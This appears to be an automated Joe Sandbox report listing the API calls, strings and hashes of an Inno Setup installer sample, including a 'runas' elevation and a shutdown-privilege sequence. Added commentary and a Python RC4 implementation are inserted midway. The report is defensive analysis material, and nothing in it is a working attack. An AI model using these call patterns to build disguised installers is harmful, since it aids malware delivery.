• Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
• Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
• Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
• Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
APIs
• CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
• Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
• Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
• Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
APIs
• RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
• Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
• Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
• Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
APIs
• FindClose.KERNEL32(00000000,000000FF,004707E0,00000000,004715F6,?,00000000,0047163F,?,00000000,00471778,?,00000000,?,00000000), ref: 00454C0E
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 7c8f6db93596433e8c6540ce52a48f0da3b0448ecaf471e45e9c42032ee7c2dc
• Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
• Opcode Fuzzy Hash: 7c8f6db93596433e8c6540ce52a48f0da3b0448ecaf471e45e9c42032ee7c2dc
• Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
APIs
• KiUserCallbackDispatcher.NTDLL(00495556,?,00495578,?,?,00000000,00495556,?,?), ref: 0041469B
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
• Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
• Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
• Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
• Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
• Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
• Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
APIs
  • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
• ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
  • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
• Opcode ID: f1fbc87c7d3064a6cf4368d53b3e4c6ee974437194041f03c0195094467d5de5
• Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
• Opcode Fuzzy Hash: f1fbc87c7d3064a6cf4368d53b3e4c6ee974437194041f03c0195094467d5de5
• Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                              APIs
                                                                              • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow
                                                                              • String ID:
                                                                              • API String ID: 530164218-0
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,0046769C,00000000,00000000,00000000,0000000C,00000000), ref: 004669CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              APIs
                                                                              • SetEndOfFile.KERNEL32(?,?,0045C192,00000000,0045C31D,?,00000000,00000002,00000002), ref: 00450933
                                                                                • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,0049799C,00000001,00000000,00000002,00000000,00497AFD,?,?,00000005,00000000,00497B31), ref: 004506B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 734332943-0
                                                                              APIs
                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,?,0049792A,00000000,00497AFD,?,?,00000005,00000000,00497B31,?,?,00000000), ref: 004072B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory
                                                                              • String ID:
                                                                              • API String ID: 1611563598-0
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID:
                                                                              • API String ID: 3375834691-0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DA68,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DA22
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 626452242-0
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003D94,00007D97,00401973), ref: 00401766
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
• SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
• LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
• SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
• GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
• GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
• GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
• GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
• GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
• GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
• GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
• GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
• FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
Strings
Similarity
• API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
• String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
• API String ID: 2323315520-3614243559
APIs
• GetTickCount.KERNEL32 ref: 0045847F
• QueryPerformanceCounter.KERNEL32(02343858,00000000,00458712,?,?,02343858,00000000,?,00458E0E,?,02343858,00000000), ref: 00458488
• GetSystemTimeAsFileTime.KERNEL32(02343858,02343858), ref: 00458492
• GetCurrentProcessId.KERNEL32(?,02343858,00000000,00458712,?,?,02343858,00000000,?,00458E0E,?,02343858,00000000), ref: 0045849B
• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458511
• GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02343858,02343858), ref: 0045851F
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,004586CE), ref: 00458567
• SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,004586BD,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,004586CE), ref: 004585A0
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
• CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458649
• CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045867F
• CloseHandle.KERNEL32(000000FF,004586C4,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004586B7
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
Strings
Similarity
• API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
• String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
• API String ID: 770386003-3271284199
APIs
  • Part of subcall function 00477E90: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477EA9
  • Part of subcall function 00477E90: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477EAF
  • Part of subcall function 00477E90: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477EC2
  • Part of subcall function 00477E90: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC), ref: 00477EEC
  • Part of subcall function 00477E90: CloseHandle.KERNEL32(00000000,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477F0A
  • Part of subcall function 00477F68: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477FFA,?,?,?,02342BDC,?,0047805C,00000000,00478172,?,?,-00000010,?), ref: 00477F98
• ShellExecuteEx.SHELL32(0000003C), ref: 004780AC
• GetLastError.KERNEL32(00000000,00478172,?,?,-00000010,?), ref: 004780B5
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478102
• GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478126
• CloseHandle.KERNEL32(00000000,00478157,00000000,00000000,000000FF,000000FF,00000000,00478150,?,00000000,00478172,?,?,-00000010,?), ref: 0047814A
Strings
Similarity
• API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
• String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
• API String ID: 883996979-221126205
APIs
• SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
• ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
Similarity
• API ID: MessageSendShowWindow
• String ID:
• API String ID: 1631623395-0
APIs
• IsIconic.USER32(?), ref: 00418393
• GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
• GetWindowRect.USER32(?), ref: 004183CC
• GetWindowLongA.USER32(?,000000F0), ref: 004183DA
• GetWindowLongA.USER32(?,000000F8), ref: 004183EF
• ScreenToClient.USER32(00000000), ref: 004183F8
• ScreenToClient.USER32(00000000,?), ref: 00418403
Strings
Similarity
• API ID: Window$ClientLongScreen$IconicPlacementRect
• String ID: ,
• API String ID: 2266315723-3772416878
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
• ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
Strings
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 107509674-3733053543
                                                                              • Opcode ID: 71598a6bdd6d5fb56d5762fa92910e3e26de8c4971b3032dc2bdc18874b6a41e
                                                                              • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                              • Opcode Fuzzy Hash: 71598a6bdd6d5fb56d5762fa92910e3e26de8c4971b3032dc2bdc18874b6a41e
                                                                              • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045CFE1
                                                                              • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045CFF1
                                                                              • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D001
                                                                              • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F453,00000000,0047F47C), ref: 0045D026
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressProc$CryptVersion
                                                                              • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                              • API String ID: 1951258720-508647305
                                                                              • Opcode ID: 6bea81dda9fbb2f0804f4d34ed7f3fdf770b10932dc8999661774a36d6befbc1
                                                                              • Instruction ID: 053e23ae93e59936775da3b85939a49c1ec117bb16e32bace9e6a444f988995f
                                                                              • Opcode Fuzzy Hash: 6bea81dda9fbb2f0804f4d34ed7f3fdf770b10932dc8999661774a36d6befbc1
                                                                              • Instruction Fuzzy Hash: 3EF0F9B0980700CBE728EFB6ACC67263795EB9570AF14813BA808A11E2D7780499CB1C
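The three exports resolved above (ISCryptGetVersion, ArcFourInit, ArcFourCrypt, looked up in a module mapped at 10000000) are the export names of Inno Setup's ISCrypt.dll, the optional DLL an Inno Setup installer loads when its setup data is encrypted; "ArcFour" is the common trademark-free name for RC4. Other strings in this list point the same way: the isRS-???.tmp pattern is Inno Setup's restart-replace temp-file prefix and "Cannot evaluate variable because [Code] isn't running yet" is an Inno Setup error message, so these routines belong to the installer stub rather than to the payload it carries. The block below is an added example, not code from the report or from Inno Setup: a plain RC4 with the same init-once / crypt-many split that the two export names imply, checked against the published RC4 test vectors. That ISCrypt.dll's ArcFour is standard RC4 is stated as an assumption about those exports, not something the report verifies.

```python
"""RC4 ("ArcFour") with the init/crypt split implied by the ArcFourInit /
ArcFourCrypt export names.  Added example, not code from the report or from
Inno Setup; that ISCrypt.dll's ArcFour is standard RC4 is an assumption."""


class ArcFour:
    """Stateful RC4 context: __init__ runs the key-scheduling algorithm (KSA),
    crypt() runs the keystream generator (PRGA) and XORs it over the data.
    Because i, j and S persist between calls, consecutive crypt() calls
    continue one keystream, which is how a file would be processed in chunks
    through an init-once / crypt-many API such as the exports above."""

    def __init__(self, key: bytes) -> None:
        if not 1 <= len(key) <= 256:
            raise ValueError("RC4 key must be 1..256 bytes")
        self.S = list(range(256))
        j = 0
        for i in range(256):                       # KSA: key-dependent permutation
            j = (j + self.S[i] + key[i % len(key)]) & 0xFF
            self.S[i], self.S[j] = self.S[j], self.S[i]
        self.i = 0
        self.j = 0

    def keystream(self, n: int) -> bytes:
        """Return the next n keystream bytes, advancing the context."""
        out = bytearray(n)
        S = self.S
        i, j = self.i, self.j
        for k in range(n):                         # PRGA
            i = (i + 1) & 0xFF
            j = (j + S[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
            out[k] = S[(S[i] + S[j]) & 0xFF]
        self.i, self.j = i, j
        return bytes(out)

    def crypt(self, data: bytes) -> bytes:
        """Encrypt or decrypt; RC4 is its own inverse under the same keystream."""
        ks = self.keystream(len(data))
        return bytes(a ^ b for a, b in zip(data, ks))


def rc4(key: bytes, data: bytes) -> bytes:
    """One-shot helper: fresh context, single crypt() call."""
    return ArcFour(key).crypt(data)


# Published RC4 test vectors (key, plaintext, ciphertext hex) used as a self-check.
TEST_VECTORS = [
    (b"Key", b"Plaintext", "bbf316e8d940af0ad3"),
    (b"Wiki", b"pedia", "1021bf0420"),
    (b"Secret", b"Attack at dawn", "45a01f645fc35b383552544b9bf5"),
]


def self_check() -> bool:
    """True when every vector encrypts to the published value and round-trips."""
    for key, pt, ct_hex in TEST_VECTORS:
        ct = rc4(key, pt)
        if ct.hex() != ct_hex or rc4(key, ct) != pt:
            return False
    return True


if __name__ == "__main__":
    print("RC4 self-check:", "ok" if self_check() else "FAILED")
    ctx = ArcFour(b"Key")                          # chunked use, like an installer stream
    print((ctx.crypt(b"Plain") + ctx.crypt(b"text")).hex())
```

RC4 keyed from an installer password protects the embedded setup files against casual extraction from the .exe, not against analysis: a sandbox that runs the installer observes the decrypted files being written anyway, which is why the dropped files, not this routine, are what the detections above are built on.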
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00497D52,?,?,00000000,0049B628,?,00497EDC,00000000,00497F30,?,?,00000000,0049B628), ref: 00497C6B
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497CEE
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00497D2A,?,00000000,?,00000000,00497D52,?,?,00000000,0049B628,?,00497EDC,00000000), ref: 00497D06
                                                                              • FindClose.KERNEL32(000000FF,00497D31,00497D2A,?,00000000,?,00000000,00497D52,?,?,00000000,0049B628,?,00497EDC,00000000,00497F30), ref: 00497D24
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirstNext
                                                                              • String ID: isRS-$isRS-???.tmp
                                                                              • API String ID: 134685335-3422211394
                                                                              • Opcode ID: 364c0e76f2c6b87ee015195f117b48597cda05d20fe84bdce713179882c005fd
                                                                              • Instruction ID: 58584d30a9cebb9496c34c78ac808807487b68c9e5340ea926fa5a91c3adbdad
                                                                              • Opcode Fuzzy Hash: 364c0e76f2c6b87ee015195f117b48597cda05d20fe84bdce713179882c005fd
                                                                              • Instruction Fuzzy Hash: 22316571A146086BDF10EF65CC41ADEBBBCDF49304F5085BBA908A32A1E63C9E458F58
                                                                              APIs
                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0045745D
                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457484
                                                                              • SetForegroundWindow.USER32(?), ref: 00457495
                                                                              • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045776F,?,00000000,004577AB), ref: 0045775A
                                                                              Strings
                                                                              • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575DA
                                                                              Similarity
                                                                              • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                              • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                              • API String ID: 2236967946-3182603685
